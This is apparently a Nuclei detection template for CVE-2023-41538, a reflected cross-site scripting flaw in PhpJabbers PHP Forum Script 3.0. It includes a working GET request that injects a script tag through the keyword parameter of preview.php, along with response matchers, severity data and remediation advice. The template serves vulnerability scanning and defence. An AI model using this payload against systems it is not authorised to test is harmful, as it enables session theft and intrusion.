Description
PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.
PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.
id: CVE-2023-41538
info:
name: PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.
impact: |
Unauthenticated attackers can inject malicious JavaScript through the keyword parameter in search functionality, potentially stealing forum administrator session cookies and accessing sensitive forum discussions.
remediation: |
Update PHPJabbers PHP Forum Script to a version newer than 3.0 that properly sanitizes the keyword parameter and encodes output in preview.php.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Forum-Script-3.0
- https://nvd.nist.gov/vuln/detail/CVE-2023-41538
- https://github.com/2lambda123/Windows10Exploits
- https://github.com/codeb0ss/CVE-2023-41538-PoC
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-41538
cwe-id: CWE-79
epss-score: 0.01139
epss-percentile: 0.64984
cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: phpjabbers
product: php_forum_script
tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers,vuln
http:
- method: GET
path:
- "{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "New Question", "><script>alert(document.domain)</script>")'
condition: and
# digest: 4a0a00473045022100f5badfacc6b7ed18805e0e300395bbbd7d71ec96791bf32f013dadbb86c4982b022023da01a33af5b503e70d670fa76c0df53f864afe862b4b1c612a8812bfb52502:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.